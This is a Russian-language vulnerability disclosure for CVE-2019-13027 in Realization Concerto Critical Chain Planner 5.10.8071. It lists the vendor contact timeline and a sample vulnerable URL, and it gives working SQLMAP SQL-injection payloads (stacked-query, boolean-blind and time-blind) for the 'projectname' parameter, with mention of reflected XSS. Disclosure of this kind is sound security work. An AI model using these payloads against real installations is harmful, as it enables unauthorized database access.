
Детали для раскрытия CVE-2019-13027
Сведения о раскрытии CVE-2019-13027
Хронология контактов с вендором: 1 июля 2019 -> Ни ответа, ни обратного письма.
4 июля 2019 -> Ни ответа, ни обратного письма.
8 июля 2019 -> Электронное письмо отправлено, создан Github.
11 июля 2019 -> Ответа вендора нет. Уязвимость раскрыта.
[Тип уязвимости] SQL-инъекция [Затронутая кодовая база продукта] CONCERTO CRITICAL CHAIN PLANNER (CCPM) - Версия: 5.10.8071 (Вероятно, затронуты другие версии ветки 5.x. Не удалось протестировать на >других ветках)
[Затронутый компонент] Realization Concerto Critical Chain Planner (также известный как CCPM) 5.10.8071 имеет ряд критических проблем безопасности, а именно SQL-инъекция как минимум на веб-странице taskupdt/taskdetails.aspx через параметр "projectname"
[Тип атаки] Удалённая
[Векторы атаки] Приложение имеет множество отражённых XSS/CSRF (например, в checklist/checklist), но самая сложная часть — это SQL-инъекции. В зависимости от версии SQL Server и/или IDS/IPS может потребоваться определённое вмешательство.
URL: https:/concertoURL/taskupdt/taskdetails.aspx?projectname=foo&taskID=1&uniqueTaskID=2&taskuniqueid=2&reportname=&securitycode=undefined&bIsSubTask=undefined
ProjectName (foo) должен существовать и быть валидным. Фаззите остальные параметры (или используйте реальный запрос). foo также содержит XSS
Обнаруженный SQL (полезные нагрузки из SQLMAP) Параметр: projectname (GET)
Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: projectname=foo';WAITFOR DELAY '0:0:5'-- Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: projectname=foo' AND 3676=3676-- Type: time-based blind Title: Microsoft SQL Server/Sybase time-based blind (IF) Payload: projectname=foo' WAITFOR DELAY '0:0:5'--[Производитель продукта] REALIZATION - https://www.realization.com/